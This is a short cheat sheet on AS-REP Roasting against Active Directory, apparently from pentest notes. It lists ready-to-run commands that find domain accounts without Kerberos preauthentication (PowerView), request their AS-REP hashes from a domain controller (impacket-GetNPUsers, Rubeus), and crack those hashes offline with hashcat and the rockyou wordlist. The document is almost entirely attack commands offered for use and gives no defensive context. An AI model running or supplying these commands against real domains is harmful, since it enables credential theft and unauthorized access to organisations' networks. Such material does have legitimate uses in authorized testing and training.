🧰AS-REP Roasting

Get-DomainUser -PreauthNotRequired

impacket-GetNPUsers -dc-ip $DC_IP$ -request -outputfile hashes.asreproast $DOMAIN$/$USER$

.\Rubeus.exe asreproast /nowrap

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/base64.rule --force